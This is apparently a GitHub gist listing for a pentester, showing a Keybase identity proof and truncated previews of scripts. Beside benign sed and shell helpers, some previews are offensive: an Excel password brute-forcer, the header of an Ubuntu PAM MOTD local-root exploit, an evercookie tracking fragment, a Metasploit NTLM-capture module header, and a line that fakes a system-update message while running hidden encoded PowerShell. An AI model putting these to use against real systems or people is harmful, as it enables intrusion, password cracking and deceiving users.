I hereby claim:
- I am gabemarshall on github.
- I am tehskylark (https://keybase.io/tehskylark) on keybase.
- I have a public key whose fingerprint is 154F E7AE 6BB1 3694 A23C DA7B A6E4 E466 86E5 5D54
To claim this, I am signing this object:
| import sys | |
| import win32com.client | |
| openedDoc = win32com.client.Dispatch("Excel.Application") | |
| filename= sys.argv[1] | |
| password_file = open ( 'wordlist.lst', 'r' ) | |
| passwords = password_file.readlines() | |
| password_file.close() | |
| passwords = [item.rstrip('\n') for item in passwords] |
| #!/bin/bash | |
| # If installing elinks via homebrew, install with `brew install elinks --devel` | |
| MYURL="http://explainshell.com/explain?cmd=" | |
| count=0 | |
| for var in "$@" | |
| do |
| #!/bin/bash | |
| # | |
| # Exploit Title: Ubuntu PAM MOTD local root | |
| # Date: July 9, 2010 | |
| # Author: Anonymous | |
| # Software Link: http://packages.ubuntu.com/ | |
| # Version: pam-1.1.0 | |
| # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) | |
| # CVE: CVE-2010-0832 | |
| # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i |
| # Reference: http://www.pement.org/sed/sed1line.txt | |
| ------------------------------------------------------------------------- | |
| USEFUL ONE-LINE SCRIPTS FOR SED (Unix stream editor) Dec. 29, 2005 | |
| Compiled by Eric Pement - pemente[at]northpark[dot]edu version 5.5 | |
| Latest version of this file (in English) is usually at: | |
| http://sed.sourceforge.net/sed1line.txt | |
| http://www.pement.org/sed/sed1line.txt |
| # OSX for Pentesting (Mavericks/Yosemite) | |
| # | |
| # A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465) | |
| #!/bin/sh | |
| # Ask for the administrator password upfront | |
| echo "Have you read through the script prior to running this? (y or n)" | |
| read bcareful |
| function _ec_dump(e,t){var n="";if(!t)t=0;var r="";for(var i=0;i<t+1;i++)r+=" ";if(typeof e=="object"){for(var s in e){var o=e[s];if(typeof o=="object"){n+=r+"'"+s+"' ...\n";n+=_ec_dump(o,t+1)}else{n+=r+"'"+s+"' => \""+o+'"\n'}}}else{n="===>"+e+"<===("+typeof e+")"}return n}function _ec_replace(e,t,n){if(e.indexOf("&"+t+"=")>-1||e.indexOf(t+"=")==0){var r=e.indexOf("&"+t+"=");if(r==-1)r=e.indexOf(t+"=");var i=e.indexOf("&",r+1);var s;if(i!=-1)s=e.substr(0,r)+e.substr(i+(r?0:1))+"&"+t+"="+n;else s=e.substr(0,r)+"&"+t+"="+n;return s}else return e+"&"+t+"="+n}function _evercookie_flash_var(e){_global_lso=e;var t=$("#myswf");if(t&&t.parentNode)t.parentNode.removeChild(t)}function onSilverlightLoad(e,t){var n=e.getHost();_global_isolated=n.Content.App.getIsolatedStorage()}function onSilverlightError(e,t){_global_isolated=""}function DetectIphone(){if(uagent.search(deviceIphone)>-1){if(DetectIpad()||DetectIpod())return false;else return true}else return false}function DetectIpod(){if(uagent.search(deviceIpod)>-1 |
| #include <netdb.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <errno.h> | |
| #define CANARY "in_the_coal_mine" | |
| struct { | |
| char buffer[1024]; |
I hereby claim:
To claim this, I am signing this object:
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| # A fork of http ntlm capture module | |
| # ProxySG SA97 | |
| # https://bto.bluecoat.com/security-advisory/sa93 | |
| ## | |
| require 'msf/core' |
| start cmd.exe @cmd /k "echo Installing system updates.. && timeout 3 >nul && echo Finalizing installation.. && timeout 3 >nul && echo Updates Complete! && timeout 1 >nul && taskkill /IM cmd.exe" & powershell -nop -win hidden -noni -enc <base64 encoded payload here> |